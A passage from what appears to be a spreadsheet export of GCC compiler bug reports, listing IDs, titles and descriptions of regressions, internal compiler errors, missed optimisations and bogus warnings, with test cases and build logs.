spawn -ignore SIGHUP /aci-gcc-fsf/builds/gcc-fsf-gccsrc/obj-arm-none-linux-gnueabihf/gcc3/gcc/testsuite/gfortran4/../../gfortran -B/aci-gcc-fsf/builds/gcc-fsf-gccsrc/obj-arm-none-linux-gnueabihf/gcc3/gcc/testsuite/gfortran4/../../ -B/aci-gcc-fsf/builds/gcc-fsf-gccsrc/obj-arm-none-linux-gnueabihf/gcc3/arm-none-linux-gnueabihf/./libgfortran/ /gcc/testsuite/gfortran.dg/string_1.f90 -fno-diagnostics-show-caret -fdiagnostics-color=never -O -pedantic-errors -S -o string_1.s
f951: out of memory allocating 17179869204 bytes after a total of 569344 bytes
compiler exited with status 1
FAIL: gfortran.dg/string_1.f90   -O   (test for errors line 7)
FAIL: gfortran.dg/string_1.f90   -O   (test for errors line 8)
FAIL: gfortran.dg/string_1.f90   -O   (test for errors line 9)
FAIL: gfortran.dg/string_1.f90   -O   (test for errors line 10)
FAIL: gfortran.dg/string_1.f90   -O  (test for excess errors)
According to gcc-testresults this happens on other targets too.
In my case I'm building a cross-compiler on x86_64 target arm-none-linux-gnueabihf (cpu/fpu/mode settings do not matter)</t>
  </si>
  <si>
    <t>GCC-67681</t>
  </si>
  <si>
    <t>Missed vectorization: induction variable used after loop</t>
  </si>
  <si>
    <t>The inner loop here:
void addlog2 (int *data)
{
  int i = 1
  for (int j=0 j&lt;=30 j++) {
    int max = 1 &lt;&lt; j
    if (FOO 
    for ( i &lt;= max i++)
      data[i] += j
  }
}
does not vectorize if the if(FOO...) is present:
$ /work/alalaw01/build-aarch64-none-elf/install/bin/aarch64-none-elf-gcc -S -O2 -ftree-vectorize -fdump-tree-vect-details=stdout loop9b.c -DFOO=1 | grep vectorized
loop9b.c:1:6: note: not vectorized: inner-loop count not invariant.
loop9b.c:8:5: note: === vect_mark_stmts_to_be_vectorized ===
loop9b.c:8:5: note: not vectorized: value used after loop.
loop9b.c:8:5: note: === vect_mark_stmts_to_be_vectorized ===
loop9b.c:8:5: note: not vectorized: value used after loop.
loop9b.c:1:6: note: vectorized 0 loops in function.
$ aarch64-none-elf-gcc -S -O2 -ftree-vectorize -fdump-tree-vect-details=stdout loop9b.c -DFOO=0 | grep vectorized
loop9b.c:4:3: note: not vectorized: inner-loop count not invariant.
loop9b.c:8:5: note: === vect_mark_stmts_to_be_vectorized ===
loop9b.c:8:5: note: loop vectorized
loop9b.c:1:6: note: vectorized 1 loops in function.
Same with -O3. Of course clever analysis could figure out that i&gt;max is never true but even without that we should be able to get 'i' back afterwards.</t>
  </si>
  <si>
    <t>GCC-59811</t>
  </si>
  <si>
    <t>[5 Regression] Huge increase in memory usage and compile time in combine</t>
  </si>
  <si>
    <t>Created attachment 31833
Example fortran source code file with problems with gfortran 4.8
When switching from gfortran 4.7 to gfortran 4.8 the memory usage and compile time vastly increases for some files in our project e.g. for the attached example file. gfortran 4.8.2 needs 50s to compile using up to 1.7 GB of RAM while gfortran 4.7 compiles it in 7s with a memory usage of 136 MB.
The command line of the gfortran-call for the attached example is
/opt/gcc/4.8.2/bin/gfortran -fno-automatic -ffixed-line-length-none -O2 -c FermionBoxEventempCoupling_Div.F -o output.o 
The problem seems to be partly linked to the option -fno-automatic since omitting it inhibits the memory increase but the compile time is still 14s with gfortran 4.8 compared to 6s with gfortran 4.7.
The problem arises with optimizations -O2 and -O1 lead to a similar discrepancy with -O0 the problem does not exist.
The gfortran 4.8 which shows the problematic behaviour is built with:
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.8.2/configure --prefix=/opt/gcc/4.8.2 --enable-languages=cc++fortran
gcc version 4.8.2 (GCC) 
The gfortran 4.7 is the built-in from openSUSE 12.2:
Target: x86_64-suse-linux
Configured with: ../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 --enable-languages=cc++objcfortranobj-c++javaada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.7 --enable-ssp --disable-libssp --disable-libitm --disable-plugin --with-bugurl=http://bugs.opensuse.org/ --with-pkgversion='SUSE Linux' --disable-libgcj --disable-libmudflap --with-slibdir=/lib64 --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-allocator=new --disable-libstdcxx-pch --enable-version-specific-runtime-libs --enable-linker-build-id --program-suffix=-4.7 --enable-linux-futex --without-system-libunwind --with-arch-32=i586 --with-tune=generic --build=x86_64-suse-linux
gcc version 4.7.1 20120723 [gcc-4_7-branch revision 189773] (SUSE Linux)</t>
  </si>
  <si>
    <t>bastian.feigl</t>
  </si>
  <si>
    <t>GCC-18707</t>
  </si>
  <si>
    <t>[4.0 Regression] Performance regression at -O2 with gzip</t>
  </si>
  <si>
    <t>GCC 4.0.0pre generates worse code than GCC 3.4.4pre at -O2 for gzip 1.2.4 on
UltraSPARC III.  I've also included Sun ONE Studio 8 as a comparison point.
32-bit GCC vs Sun ONE Studio 8 CC:
cc: -fast -xarch=v8plusb -xchip=ultra3
gcc: -O2 -mcpu=ultrasparc3
-rwxrwxr-x   1 eric     eric       72464 Nov 28 13:08 gzip33
-rwxrwxr-x   1 eric     eric       71444 Nov 28 13:09 gzip34
-rwxrwxr-x   1 eric     eric       71904 Nov 28 13:10 gzip40
-rwxrwxr-x   1 eric     eric      118316 Nov 28 13:42 gzipcc
./gzip33 gcc.tar  28.99s user 0.78s system 98% cpu 30.343 total
./gzip33 gcc.tar  29.03s user 0.64s system 98% cpu 29.989 total
./gzip33 gcc.tar  29.01s user 0.64s system 98% cpu 29.994 total
./gzip34 gcc.tar  24.24s user 0.70s system 98% cpu 25.383 total
./gzip34 gcc.tar  24.29s user 0.65s system 98% cpu 25.296 total
./gzip34 gcc.tar  24.30s user 0.64s system 98% cpu 25.231 total
./gzip40 gcc.tar  24.76s user 0.63s system 98% cpu 25.737 total
./gzip40 gcc.tar  24.75s user 0.63s system 98% cpu 25.668 total
./gzip40 gcc.tar  24.75s user 0.58s system 98% cpu 25.696 total
./gzipcc gcc.tar  24.53s user 0.99s system 95% cpu 26.663 total
./gzipcc gcc.tar  24.45s user 0.73s system 98% cpu 25.476 total
./gzipcc gcc.tar  24.51s user 0.65s system 98% cpu 25.513 total
64-bit GCC vs Sun ONE Studio 8 CC:
cc: -fast -xarch=v9b -xchip=ultra3
gcc: -O2 -mcpu=ultrasparc3
-rwxrwxr-x   1 eric     eric      109336 Nov 28 12:56 gzip33
-rwxrwxr-x   1 eric     eric      104504 Nov 28 12:57 gzip34
-rwxrwxr-x   1 eric     eric      105048 Nov 28 12:59 gzip40
-rwxrwxr-x   1 eric     eric      149120 Nov 28 13:45 gzipcc
./gzip33 gcc.tar  33.54s user 0.65s system 99% cpu 34.458 total
./gzip33 gcc.tar  33.40s user 0.64s system 99% cpu 34.154 total
./gzip33 gcc.tar  33.45s user 0.54s system 99% cpu 34.101 total
./gzip34 gcc.tar  28.54s user 0.71s system 99% cpu 29.365 total
./gzip34 gcc.tar  28.64s user 0.60s system 99% cpu 29.345 total
./gzip34 gcc.tar  28.78s user 0.43s system 99% cpu 29.295 total
./gzip40 gcc.tar  30.77s user 0.48s system 99% cpu 31.369 total
./gzip40 gcc.tar  30.51s user 0.72s system 99% cpu 31.367 total
./gzip40 gcc.tar  30.65s user 0.62s system 99% cpu 31.378 total
./gzipcc gcc.tar  26.67s user 0.83s system 98% cpu 27.840 total
./gzipcc gcc.tar  26.69s user 0.67s system 99% cpu 27.438 total
./gzipcc gcc.tar  26.58s user 0.75s system 99% cpu 27.457 total</t>
  </si>
  <si>
    <t>GCC-50827</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: RTL check: expected elt 0 type 'e' or 'u' have '0' (rtx entry_value) in loc_cmp at var-tracking.c:3011</t>
  </si>
  <si>
    <t>Created attachment 25575
autoreduced testcase
Compiler output:
$ gcc -O2 -fno-ipa-sra -g testcase.C 
testcase.C: In function 'void std::_Destroy(_ForwardIterator _ForwardIterator _Allocator _Allocator = __gnu_cxx::vec_alloc_type]':
testcase.C:53:3: internal compiler error: RTL check: expected elt 0 type 'e' or 'u' have '0' (rtx entry_value) in loc_cmp at var-tracking.c:3011
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
RTL checking is probably needed to reproduce.
Tested revisions:
r180324 - crash
r180260 - crash
r179959 - OK</t>
  </si>
  <si>
    <t>GCC-15901</t>
  </si>
  <si>
    <t>libobjc is not build shared if you do not supply --enable-shared</t>
  </si>
  <si>
    <t>for some reason libobjc is not building as shared unlike every other target library unless you supply --
enable-shared.</t>
  </si>
  <si>
    <t>GCC-58530</t>
  </si>
  <si>
    <t>[4.9 Regression] crash in get_combined_adhoc_loc</t>
  </si>
  <si>
    <t>Created attachment 30896
gzipped C++ source code
I just tried to compile package activemq-cpp-3.7.1-1 with gcc 4.9 trunk
dated 20130925. It said
activemq/commands/ActiveMQBytesMessage.cpp:91:39: internal compiler error: Aborted
     message-&gt;copyDataStructure( this )
                                       ^
0xb0715f crash_signal
    ../../src/trunk/gcc/toplev.c:335
0x1022779 get_combined_adhoc_loc(line_maps* unsigned int void*)
    ../../src/trunk/libcpp/line-map.c:106
0xb6417c copy_phis_for_bb
    ../../src/trunk/gcc/tree-inline.c:2093
0xb6417c copy_cfg_body
    ../../src/trunk/gcc/tree-inline.c:2446
0xb6417c copy_body
    ../../src/trunk/gcc/tree-inline.c:2625
0xb69823 expand_call_inline
    ../../src/trunk/gcc/tree-inline.c:4234
0xb69823 gimple_expand_calls_inline
    ../../src/trunk/gcc/tree-inline.c:4341
0xb69823 optimize_inline_calls(tree_node*)
    ../../src/trunk/gcc/tree-inline.c:4496
0xf8a38b inline_transform(cgraph_node*)
    ../../src/trunk/gcc/ipa-inline-transform.c:436
0xa5b199 execute_one_ipa_transform_pass
    ../../src/trunk/gcc/passes.c:2039
0xa5b199 execute_all_ipa_transforms()
    ../../src/trunk/gcc/passes.c:2079
0x7f3df0 expand_function
    ../../src/trunk/gcc/cgraphunit.c:1743
0x7f5e4e expand_all_functions
    ../../src/trunk/gcc/cgraphunit.c:1855
0x7f5e4e compile()
    ../../src/trunk/gcc/cgraphunit.c:2192
0x7f6439 finalize_compilation_unit()
    ../../src/trunk/gcc/cgraphunit.c:2269
0x60083d cp_write_global_declarations()
    ../../src/trunk/gcc/cp/decl2.c:4360
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Preprocessed source code attached. Flag -O3 required.</t>
  </si>
  <si>
    <t>GCC-70966</t>
  </si>
  <si>
    <t>new_delete_resource() has deinit lifetime issues.</t>
  </si>
  <si>
    <t>Created attachment 38422
example.cpp
The value returned from 'new_delete_resource()' should be usable at all stages of program startup and termination.
In the current implementation the static deinitialization order fiasco can occur when a static object 'obj' is constructed before the first call to 'new_delete_resource()' and 'obj' references 'new_delete_resource()' in its destructor.</t>
  </si>
  <si>
    <t>GCC-60199</t>
  </si>
  <si>
    <t>'error: field initializer is not constant' when initializing static member function pointer to a function</t>
  </si>
  <si>
    <t>The following code compiles in Clang 3.3 but not GCC 4.8.2:
//---------------------------------------
// g++ -std=c++11 -Wall -Wextra -pedantic 
void f() {}
static constexpr void (*g1)() =  // ok
static constexpr void (*g2)() = f // ok
struct S {
    static constexpr void (*g3)() =  // ok
    static constexpr void (*g4)() = f // error: field initializer is not constant
}
//---------------------------------------</t>
  </si>
  <si>
    <t>abigail.buccaneer</t>
  </si>
  <si>
    <t>GCC-4854</t>
  </si>
  <si>
    <t>GCC 3.0.2 fails to flag ambiguous method definitions</t>
  </si>
  <si>
    <t>Gcc 3.0.2 (i686-pc-linux-gnu) has a quirk in which it does not
catch ambiguous method definitions.  If compiling class simple
(with -c) 3.0.2 will fail in the assembly stage citing
Error: Symbol xyzfuncEv already defined.  Inlining avoids
the quirk.
Gcc 2.96-MDK8.1 does the right thing by informing the user.
class simple
{
  public:
    void func()
    int func()
}
void simple::func() { }
int simple::func() { return 0 }
Michael Arras
mkarras110@yahoo.com
Release:
3.0.2
Environment:
Linux 2.4 (i386)
How-To-Repeat:
g++ -c simple.cxx</t>
  </si>
  <si>
    <t>mkarras110</t>
  </si>
  <si>
    <t>GCC-3264</t>
  </si>
  <si>
    <t>gcc -v --help crashes</t>
  </si>
  <si>
    <t xml:space="preserve">	sizeof (compiler_params) equals sizeof (void *) but *not* the
	number of allocated compiler params (which would be
	num_compiler_params but that is local to params.c).
Release:
3.0
Environment:
System: Linux sykes 2.4.4-SMP #1 SMP Mon Jun 4 16:36:25 GMT 2001 ia64 unknown
Architecture: ia64
host: ia64-suse-linux-gnu
build: ia64-suse-linux-gnu
target: ia64-suse-linux-gnu
configured with: ../configure --enable-threads=posix --enable-long-long --prefix=/opt/gcc30 --with-local-prefix=/usr/local --enable-languages=cc++f77objcjava --disable-nls --enable-shared ia64-suse-linux
How-To-Repeat:
	$ gcc -v --help</t>
  </si>
  <si>
    <t>GCC-57028</t>
  </si>
  <si>
    <t>[4.9 regression] Fortran bootstrap fails due to missing zlib.h</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.9-20130421 on x86_64-linux (Fedora 17) w/ Fortran
enabled but no zlib-devel package installed results in:
/mnt/scratch/objdir49/./prev-gcc/xg++ -B/mnt/scratch/objdir49/./prev-gcc/ -B/mnt/scratch/install49/x86_64-unknown-linux-gnu/bin/ -nostdinc++ -B/mnt/scratch/objdir49/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -B/mnt/scratch/objdir49/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -I/mnt/scratch/objdir49/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/mnt/scratch/objdir49/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include -I/mnt/scratch/gcc-4.9-20130421/libstdc++-v3/libsupc++ -L/mnt/scratch/objdir49/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/mnt/scratch/objdir49/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -c  -DIN_GCC_FRONTEND -g -O2 -gtoggle -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror   -DHAVE_CONFIG_H -I. -Ifortran -I/mnt/scratch/gcc-4.9-20130421/gcc -I/mnt/scratch/gcc-4.9-20130421/gcc/fortran -I/mnt/scratch/gcc-4.9-20130421/gcc/../include -I/mnt/scratch/gcc-4.9-20130421/gcc/../libcpp/include -I/home/mikpe/pkgs/linux-x86_64/gmp-5.1.1/include -I/home/mikpe/pkgs/linux-x86_64/mpfr-3.1.2/include -I/home/mikpe/pkgs/linux-x86_64/mpc-1.0.1/include  -I/mnt/scratch/gcc-4.9-20130421/gcc/../libdecnumber -I/mnt/scratch/gcc-4.9-20130421/gcc/../libdecnumber/bid -I../libdecnumber -I/mnt/scratch/gcc-4.9-20130421/gcc/../libbacktrace    /mnt/scratch/gcc-4.9-20130421/gcc/fortran/module.c -o fortran/module.o
/mnt/scratch/gcc-4.9-20130421/gcc/fortran/module.c:78:18: fatal error: zlib.h: No such file or directory
 #include 
                  ^
compilation terminated.
make[3]: *** [fortran/module.o] Error 1
make[3]: *** Waiting for unfinished jobs....
rm gcj-dbtool.pod gcj.pod jcf-dump.pod jv-convert.pod grmic.pod gc-analyze.pod gfortran.pod gfdl.pod gij.pod gcc.pod gcov.pod cpp.pod fsf-funding.pod
make[3]: Leaving directory `/mnt/scratch/objdir49/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/mnt/scratch/objdir49'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir49'
make: *** [bootstrap] Error 2
The previous weekly snapshot 4.9-20130414 bootstrapped fine on the same system with the same configuration options.</t>
  </si>
  <si>
    <t>GCC-37743</t>
  </si>
  <si>
    <t>Bogus printf format warning with __builtin_bswap32.</t>
  </si>
  <si>
    <t>Code below generates an incorrect warning:
$ gcc -Wall -c temp.c
temp.c:4: warning: format â€˜%xâ€™ expects type â€˜unsigned intâ€™ but argument 2 has type â€˜unsigned intâ€™
$ cat temp.c
int format (const char * f ...) __attribute__ ((format (printf 1 2)))
void bar (unsigned int x)
{
    format (%x __builtin_bswap32 (x))
}
Unless I'm going mad â€˜unsigned intâ€™ and â€˜unsigned intâ€™ are identical.
Giving an explicit prototype of __builtin_bswap32 works-around.
$ gcc --version  rpm -q gcc
gcc (GCC) 4.3.2 20080917 (Red Hat 4.3.2-4)
Copyright (C) 2008 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
gcc-4.3.2-4.x86_64</t>
  </si>
  <si>
    <t>GCC-14188</t>
  </si>
  <si>
    <t>Suggestion: improve warning message for call through incompatible type</t>
  </si>
  <si>
    <t>When calling a function through an incompatible type gcc emits this warning 
message:
   test1.hc:14: warning: function called through a non-compatible type
and replaces the call with a fatal trap.  This is legal since the behaviour 
in such cases is undefined.  However it would be useful to the programmer if 
the warning message mentioned that the call had been compiled as a fatal trap.</t>
  </si>
  <si>
    <t>simonmar</t>
  </si>
  <si>
    <t>GCC-53449</t>
  </si>
  <si>
    <t>[4.8 regression] fortran fails to build with LTO bootstrap</t>
  </si>
  <si>
    <t>with revision 187761
I now get an error while building fortran 
In file included from ../../gcc-trunk/gcc/fortran/trans-common.c:1310:0
                 from ./gt-fortran-trans-io.h:88
                 from :4794:
../../gcc-trunk/gcc/fortran/parse.c: In function 'gfc_parse_file':
../../gcc-trunk/gcc/fortran/parse.c:4603:60: error: 'errors_before' may be used uninitialized in this function [-Werror=maybe-uninitialized]
       gfc_dump_module (s.sym-&gt;name errors_before == errors)
                                                            ^
In file included from ../../gcc-trunk/gcc/fortran/trans-common.c:1310:0
                 from ./gt-fortran-trans-io.h:88
                 from :4794:
../../gcc-trunk/gcc/fortran/parse.c:4487:21: note: 'errors_before' was declared here
   int seen_program errors_before errors
                     ^
lto1: all warnings being treated as errors
make[4]: *** [/tmp/innocent/ccixchHw.ltrans30.ltrans.o] Error 1
configuration that fails
../gcc-trunk/configure --prefix=/afs/cern.ch/user/i/innocent/w2 --enable-languages=cc++fortran -enable-gold=yes --enable-lto --with-build-config=bootstrap-lto --with-gmp-lib=/usr/local/lib64 --with-mpfr-lib=/usr/local/lib64 -with-mpc-lib=/usr/local/lib64 --enable-cloog-backend=isl --with-cloog=/usr/local --with-ppl-lib=/usr/local/lib64 CFLAGS='-O2 -ftree-vectorize -fPIC' CXXFLAGS='-O2 -fPIC -ftree-vectorize -fvisibility-inlines-hidden -march=native' -enable-libitm -disable-multilib
configuration that succeeds
../gcc-trunk/configure --enable-languages=cc++fortran --disable-multilib --enable-gold=yes --disable-nls --enable-lto --with-mpc=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0 --with-gmp=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0 --with-mpfr=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0 --prefix=/afs/cern.ch/user/i/innocent/w3/gcc47slc5</t>
  </si>
  <si>
    <t>GCC-71474</t>
  </si>
  <si>
    <t>PRED_LOOP_IV_COMPARE wrongly calculates number of iterations of a loop</t>
  </si>
  <si>
    <t>Hello.
During investigation of poor predictor 'loop iv compare' heuristics I've come to a problematic test-case:
subroutine rubber(arg1 arg2)
integer kl
real*8 arg1(333) arg2(333)
  do l=13
     do k=1l
        arg1(kl1) = arg2(kl1)
     enddo
  enddo
end
042t.profile_estimate gimple looks as follows:
  :
  # l_13 = PHI 
  if (l_13 &gt; 0)
    goto 
  else
    goto 
  :
  # k_6 = PHI 
  :
  # k_12 = PHI 
  _1 = (integer(kind=8)) l_13
  _2 = _1 * 3
  _3 = (integer(kind=8)) k_12
  _4 = _2 + _3
  _5 = _4 + -4
  _11 = *arg2_22(D)[_5]
  *arg1_23(D)[_5] = _11
  k_26 = k_12 + 1
  if (k_12 == l_13)
    goto 
  else
    goto 
  :
  goto 
  :
  l_28 = l_13 + 1
  if (l_13 == 3)
    goto 
  else
    goto 
  :
  goto 
  :
  return
Problem is that is_comparison_with_loop_invariant_p is called for the gimple compare in BB 3 (if (l_13 &gt; 0))
which does not determine a number of iterations of the loop. As a result we get confusing loop_bound_step loop_iv_base
that are eventually used by predict_iv_comparison to calculate the misleading probability:
  loop iv compare heuristics of edge 3-&gt;4: 0.0%
While the proper value should be 100% as l_13 is always a positive number.</t>
  </si>
  <si>
    <t>GCC-51171</t>
  </si>
  <si>
    <t>XFAIL: libitm.c/reentrant.c execution test</t>
  </si>
  <si>
    <t>This runtime test broke after the trunk-&gt;transactional-memory-branch merge on 2011-09-14.  The failure has been XFAILed but should eventually be fixed.</t>
  </si>
  <si>
    <t>GCC-80059</t>
  </si>
  <si>
    <t>[7 Regression] ICE with invalid noexcept for __transaction_atomic</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -fgnu-tm) triggers
an ICE on trunk:
=================================================
template int foo(bool b)
{
  return __transaction_atomic noexcept(b) (0)
}
void bar()
{
  foo(true)
}
=================================================
bug.cc: In function 'int foo(bool)':
bug.cc:3:45: internal compiler error: unexpected expression 'b' of kind implicit_conv_expr
   return __transaction_atomic noexcept(b) (0)
                                             ^
0x83f890 cxx_eval_constant_expression
        ../../gcc/gcc/cp/constexpr.c:4575
0x842ece cxx_eval_outermost_constant_expr
        ../../gcc/gcc/cp/constexpr.c:4633
0x776f2a build_must_not_throw_expr(tree_node* tree_node*)
        ../../gcc/gcc/cp/except.c:274
0x7ac6ff build_transaction_expr(unsigned int tree_node* int tree_node*)
        ../../gcc/gcc/cp/semantics.c:8747
0x72628f cp_parser_transaction_expression
        ../../gcc/gcc/cp/parser.c:37871
0x72628f cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7895
0x726c93 cp_parser_cast_expression
        ../../gcc/gcc/cp/parser.c:8780
0x7273e7 cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:8881
0x727cb4 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:9168
0x72b9c8 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:9337
0x719f9a cp_parser_jump_statement
        ../../gcc/gcc/cp/parser.c:12147
0x719f9a cp_parser_statement
        ../../gcc/gcc/cp/parser.c:10581
0x71a84d cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:11027
0x71a91f cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:10981
0x71aab3 cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:21428
0x71aab3 cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:21466
0x71b331 cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:26253
0x71c01d cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:26165
0x71c01d cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:19155
0x71c5ca cp_parser_single_declaration
        ../../gcc/gcc/cp/parser.c:26711
Please submit a full bug report [etc.]
This is a recent regression introduced between 2017-03-02 and 2017-03-06.</t>
  </si>
  <si>
    <t>GCC-60417</t>
  </si>
  <si>
    <t>[DR 1518] Bogus error on C++03 aggregate initialization</t>
  </si>
  <si>
    <t>This testcase is valid C++98 but we've started to reject it since the patch for 54835.
struct A { explicit A(int = 0) }
struct B { A a }
int main()
{
  B b = {}
}</t>
  </si>
  <si>
    <t>GCC-78757</t>
  </si>
  <si>
    <t>[7 Regression] ICE with function returning a pointer to a character</t>
  </si>
  <si>
    <t>The following testcase causes an ICE when compiling with -O1 on x86_64-pc-linux-gnu on todays (2016-12-09) trunk:
! Reduced and modified from char_result_8.f90
! { dg-do run }
program main
  implicit none
  character (len = 30) target :: string
  character(len=30) pointer :: s
  s =&gt; f4(70_8)
contains
  function f4 (i)
    integer(8) :: i
    character (len = i) pointer :: f4
    f4 =&gt; string
  end function f4
end program main
A slightly different way of causing (most likely) the same bug to appear (compile with -O1 -fdefault-integer-8):
! Reduced from char_result_8.f90
! { dg-options -fdefault-integer-8 }
! { dg-do run }
program main
  implicit none
  character (len = 30) target :: string
  character(len=30) pointer :: s
  s =&gt; f4(70)
contains
  function f4 (i)
    integer :: i
    character (len = i) pointer :: f4
    f4 =&gt; string
  end function f4
end program main</t>
  </si>
  <si>
    <t>GCC-20624</t>
  </si>
  <si>
    <t>[4.0 Regression] wrong control reaches end of non-void function warning</t>
  </si>
  <si>
    <t>If you compile this code 
#include 
void test()
{
 	 std::ifstream in
}
against the actual CVS version of STLport 5.0
(http://www.breaken.de/temp/STLport.zip) you get this warning:
  In member function 'typename stlp_std::basic_filebuf&lt;_CharT
_Traits&gt;::pos_type stlp_std::basic_filebuf::seekoff(typename
_Traits::off_type int int) [with _CharT = char _Traits =
stlp_std::char_traits]': 
372 C:\cvs\STLport\stlport\stl\_fstream.c [Warning] control reaches end of
non-void function 
Because the STLport is very complex I wasn't able to reduce the code properly.
Maybe it can already be done by just posting the function causing it:
template 
__BF_pos_type__
basic_filebuf::seekoff(off_type __off
                                        ios_base::seekdir __whence
                                        ios_base::openmode /* dummy */) {
  if (this-&gt;is_open() &amp;&amp;
      (__off == 0 || (_M_constant_width &amp;&amp; this-&gt;_M_base._M_in_binary_mode()))) {
    if (!_M_seek_init(__off != 0 || __whence != ios_base::cur))
      return pos_type(-1)
    // Seek to beginning or end regardless of whether we're in input mode.
    if (__whence == ios_base::beg || __whence == ios_base::end)
      return _M_seek_return(_M_base._M_seek(_M_width * __off __whence)
                            _State_type())
    // Seek relative to current position.  Complicated if we're in input mode.
    else if (__whence == ios_base::cur) {
      if (!_M_in_input_mode)
        return _M_seek_return(_M_base._M_seek(_M_width * __off __whence)
                              _State_type())
      else if (_M_mmap_base != 0) {
        // __off is relative to gptr().  We need to do a bit of arithmetic
        // to get an offset relative to the external file pointer.
        streamoff __adjust = _M_mmap_len - (this-&gt;gptr() - (_CharT*) _M_mmap_base)
        // if __off == 0 we do not need to exit input mode and to shift file
pointer
        if (__off == 0) {
          return pos_type(_M_base._M_seek(0 ios_base::cur) - __adjust)
        }
        else
          return _M_seek_return(_M_base._M_seek(__off - __adjust
ios_base::cur) _State_type())
      }
      else if (_M_constant_width) { // Get or set the position.  
        streamoff __iadj = _M_width * (this-&gt;gptr() - this-&gt;eback())
        // Compensate for offset relative to gptr versus offset relative
        // to external pointer.  For a text-oriented stream where the 
        // compensation is more than just pointer arithmetic we may get
        // but not set the current position.
        if (__iadj &lt;= _M_ext_buf_end - _M_ext_buf) {
          streamoff __eadj =  _M_base._M_get_offset(_M_ext_buf + __iadj
_M_ext_buf_end)
          if (__off == 0) {
            return pos_type(_M_base._M_seek(0 ios_base::cur) - __eadj)
          }  else {
            return _M_seek_return(_M_base._M_seek(__off - __eadj
ios_base::cur) _State_type())
          }
        }
        else
          return pos_type(-1)
      }
      else {                    // Get the position.  Encoding is var width.
        // Get position in internal buffer.
        ptrdiff_t __ipos = this-&gt;gptr() - this-&gt;eback()
        // Get corresponding position in external buffer.
        _State_type __state = _M_state
        int __epos = _M_codecvt-&gt;length(__state _M_ext_buf _M_ext_buf_end
                                        __ipos)
        // Sanity check (expensive): make sure __epos is the right answer.
        _State_type __tmp_state = _M_state
        _Filebuf_Tmp_Buf __buf(__ipos)
        _CharT* __ibegin = __buf._M_ptr
        _CharT* __inext  = __ibegin
        const char* __dummy
        typename _Codecvt::result __status
          = _M_codecvt-&gt;in(__tmp_state
                           _M_ext_buf _M_ext_buf + __epos __dummy
                           __ibegin __ibegin + __ipos __inext)
        if (__status != _Codecvt::error &amp;&amp;
            (__status == _Codecvt::noconv ||
             (__inext == __ibegin + __ipos &amp;&amp;
              equal(this-&gt;gptr() this-&gt;eback() __ibegin
                    _Eq_traits())))) {
          // Get the current position (at the end of the external buffer)
          // then adjust it.  Again it might be a text-oriented stream.
          streamoff __cur = _M_base._M_seek(0 ios_base::cur)
          streamoff __adj =
            _M_base._M_get_offset(_M_ext_buf _M_ext_buf + __epos) -
            _M_base._M_get_offset(_M_ext_buf _M_ext_buf_end)
          if (__cur != -1 &amp;&amp; __cur + __adj &gt;= 0)
            return _M_seek_return(__cur + __adj __state)
          else
            return pos_type(-1)
        }
        else                    // We failed the sanity check.
          return pos_type(-1)
      }
    }
    else                        // Unrecognized value for __whence.
      return pos_type(-1)
  }
  else
    return pos_type(-1)
}
I also got another piece of code that also causes a wrong warning but I wasn't
able to reduce that code either.
I am using
Target: i686-pc-mingw32
Configured with: /datal/gcc/gcc/configure --prefix=/datal/gcc/build/wingcc
--build=i686-pc-linux-gnu --host=i686-pc-mingw32 --target=i686-pc-mingw32
--enable-languages=cc++java --with-gcc --with-gnu-as --with-gnu-ld
--enable-threads=win32 --disable-nls --disable-win32-registry --disable-shared
--disable-debug --without-newlib --enable-libgcj --disable-java-awt --without-x
--enable-java-gc=boehm --disable-libgcj-debug --enable-interpreter
--enable-hash-synchronization --enable-sjlj-exceptions --enable-libgcj-multifile
--enable-libgcj-mingw-osapi=ansi
Thread model: win32
gcc version 4.0.0 20050320 (prerelease)</t>
  </si>
  <si>
    <t>GCC-18143</t>
  </si>
  <si>
    <t>[4.0 Regression] Duplicated thunk with a huge member in the hierarchy</t>
  </si>
  <si>
    <t>For the code listed below GCC 4.0 (20041010) emits duplicated virtual 
destructor thunk so assembler fails to compile.
The size of c3::m member does matter there - test fails with magic value 
0x3fffd or above and passes with any value below.
$ cat go.cpp 
struct c0 {
    virtual void foo(){}
}
struct c1 {
    virtual ~c1(){}
}
